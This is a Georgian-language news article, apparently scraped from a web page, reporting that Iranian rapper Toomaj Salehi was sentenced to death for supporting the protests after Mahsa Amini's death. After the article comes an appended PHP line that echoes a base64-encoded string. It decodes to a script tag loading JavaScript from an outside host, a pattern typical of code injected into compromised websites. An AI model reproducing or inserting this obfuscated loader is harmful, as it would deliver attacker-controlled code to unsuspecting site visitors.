celsiusi
ავერსი შნაიდერი

ირანელ რეპერს, თუმაჯ სალეჰის ანტისამთავრობო გამოსვლების გამო სიკვდილით დასჯა მიუსაჯეს. ინფორმაციას ამის შესახებ „ბიბისი“ ავრცელებს.

თუმაჯ სალეჰი თავის სიმღერებში 2022 წელს მაჰსა ამინის გარდაცვალების შემდეგ დაწყებულ გამოსვლებს უჭერდა მხარს.

სალეჰი 2022 წლის ოქტომბერში მას შემდეგ დააპატიმრეს, რაც საპროტესტო აქციების მხარდასაჭერად საჯარო განცხადებები გააკეთა. 2023 წლის ივლისში მას ექვსი წლით და სამი თვით თავისუფლების აღკვეთა შეუფარდეს, ხოლო მიმდინარე წლის იანვარში ახალი ბრალდებები წაუყენეს, რის გამოც სიკვდილით დასჯა მიუსაჯეს. როგორც ბრალდებულის ადვოკატი აცხადებს, გადაწყვეტილებას გაასაჩივრებს.

ირანის მთავრობას აღნიშნულის შესახებ კომენტარი არ გაუკეთებია.

შეგახსენებთ, მაჰსა ამინი 2022 წლის სექტემბერში, „მორალის პოლიციის“ მიერ ჰიჯაბის არასათანადოდ ტარების გამო დაკავების შემდეგ საპატიმროში გარდაიცვალა. ამ ფაქტმა ირანული საზოგადოების აღშფოთება და მასშტაბური საპროტესტო გამოსვლები გამოიწვია.

178
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");